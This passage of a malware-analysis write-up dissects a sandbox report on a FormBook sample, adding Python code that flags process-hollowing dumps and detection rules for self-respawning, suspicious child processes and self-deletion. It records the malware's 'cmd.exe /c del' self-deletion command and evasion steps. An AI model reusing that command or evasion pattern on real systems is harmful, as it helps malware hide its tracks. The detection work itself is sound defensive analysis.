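EXEC_WRITE = {0x40, 0x80}          # protections that are both executable and writable

NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\.sdmp$",
    re.I)


def parse_dump_name(name):
    m = NAME_RE.match(name)
    if not m:
        raise ValueError("not a .sdmp name: " + name)
    prot = int(m["prot"], 16)
    typ = int(m["type"], 16)
    base_prot = prot & 0xFF
    mods = "".join("|" + n for f, n in PAGE_MOD.items() if prot & f)
    return {
        "proc": m["proc"], "stage": m["stage"], "dump": int(m["dump"]),
        "base": int(m["base"], 16),
        "prot": prot,
        "prot_name": PAGE_BASE.get(base_prot, "PAGE_?(0x%x)" % base_prot) + mods,
        "type_name": MEM_TYPE.get(typ, "unknown(0x%x)" % typ),
    }


def hollowing_indicators(names, image_base):
    """Dumps taken at the sample's image base while executable and writable.
    A normally mapped PE never has an RWX region at its image base."""
    return [d for d in map(parse_dump_name, names)
            if d["base"] == image_base and (d["prot"] & 0xFF) in EXEC_WRITE]


# Names copied from the Yara match lines of the two SHIPPING DOCUMENT.exe instances.
REPORTED = [
    "00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp",
    "00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp",
    "00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp",
    "00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp",
    "00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp",
]
IMAGE_BASE = 0x400000   # 'Imagebase' of SHIPPING DOCUMENT.exe per the report

if __name__ == "__main__":
    for d in map(parse_dump_name, REPORTED):
        print(d["proc"], hex(d["base"]), d["prot_name"], d["type_name"])
    print([hex(d["base"]) for d in hollowing_indicators(REPORTED, IMAGE_BASE)])
```

Read this way, the first instance (process index 00000000) only ever shows FormBook in a PAGE_READWRITE heap region, which fits a loader that has decrypted the payload but not yet executed it; the second instance carries the payload in PAGE_EXECUTE_READWRITE memory at its own image base and in two further regions. When you carve your own dumps, the region at 0x400000 is the one to pull, since it is the unpacked module rather than a staging buffer.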

                                          General

                                          Start time:20:10:39
                                          Start date:04/05/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0x8e0000
                                          File size:831488 bytes
                                          MD5 hash:7FC345F685C2A58283872D851316ACC4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Imagebase:0xd60000
                                          File size:32768 bytes
                                          MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
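Taken together, the process blocks above describe the usual FormBook run: the sample starts a second copy of itself (20:10:33 and 20:10:34), the payload ends up in explorer.exe, explorer.exe launches two 32-bit system utilities with bare command lines (autofmt.exe and NETSTAT.EXE, the latter carrying the FormBook Yara matches), and cmd.exe deletes the original file. The block below is an added example, not part of the report, that expresses those three observations as detection logic over Sysmon-style process-creation events. The PIDs and parent links are constructed, because this section of the report does not list them; the images, command lines and start times are the ones shown above.

```python
"""Added example: detection logic over the process list above, as
Sysmon-style events. PIDs and parent links are constructed; images,
command lines and start times are taken from the 'General' blocks."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    start: datetime
    image: str
    cmdline: str


def _t(hhmmss):
    return datetime.strptime("2021-05-04 " + hhmmss, "%Y-%m-%d %H:%M:%S")


SAMPLE = r"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe"
EVENTS = [  # constructed PIDs/PPIDs; everything else from the report
    ProcEvent(4100, 1000, _t("20:10:33"), SAMPLE, "'%s'" % SAMPLE),
    ProcEvent(4104, 4100, _t("20:10:34"), SAMPLE, "'%s'" % SAMPLE),
    ProcEvent(2060, 1000, _t("20:10:39"), r"C:\Windows\explorer.exe", ""),
    ProcEvent(4120, 2060, _t("20:10:54"), r"C:\Windows\SysWOW64\autofmt.exe",
              r"C:\Windows\SysWOW64\autofmt.exe"),
    ProcEvent(4124, 2060, _t("20:10:54"), r"C:\Windows\SysWOW64\NETSTAT.EXE",
              r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    ProcEvent(4140, 4124, _t("20:10:58"), r"C:\Windows\SysWOW64\cmd.exe",
              "/c del '%s'" % SAMPLE),
    ProcEvent(4144, 4140, _t("20:10:58"), r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]


def self_respawn(events, window=timedelta(seconds=5)):
    """A process starting a second copy of its own image within `window`,
    the usual setup for process hollowing."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        p = by_pid.get(e.ppid)
        if p and p.image.lower() == e.image.lower() \
                and timedelta(0) <= e.start - p.start <= window:
            hits.append((p.pid, e.pid))
    return hits


def explorer_spawns_bare_syswow64(events):
    """explorer.exe launching a SysWOW64 utility with no arguments."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        p = by_pid.get(e.ppid)
        bare = e.cmdline.strip().strip("'\"").lower() in ("", e.image.lower())
        if p and p.image.lower() == "c:\\windows\\explorer.exe" \
                and e.image.lower().startswith("c:\\windows\\syswow64\\") and bare:
            hits.append(e.pid)
    return hits


DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<path>[^'"]+?)['"]?\s*$""", re.I)


def self_delete(events):
    """cmd.exe /c del of an executable that already ran in this trace."""
    ran = {e.image.lower() for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e.cmdline)
        if m and m["path"].lower() in ran:
            hits.append((e.pid, m["path"]))
    return hits


def score(events):
    """Run all three rules; an alert should need more than one of them."""
    return {"self_respawn": self_respawn(events),
            "explorer_bare_syswow64": explorer_spawns_bare_syswow64(events),
            "self_delete": self_delete(events)}


if __name__ == "__main__":
    for rule, hits in score(EVENTS).items():
        print(rule, hits)
```

The middle rule is the noisy one: explorer.exe also launches SysWOW64 binaries when a user double-clicks them, so it should raise the score rather than alert alone. The self-delete rule is the cleanest signal here because it ties the cmd.exe command line back to an image that already executed in the same trace, which a benign cleanup script rarely does.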

                                          Disassembly

                                          Code Analysis
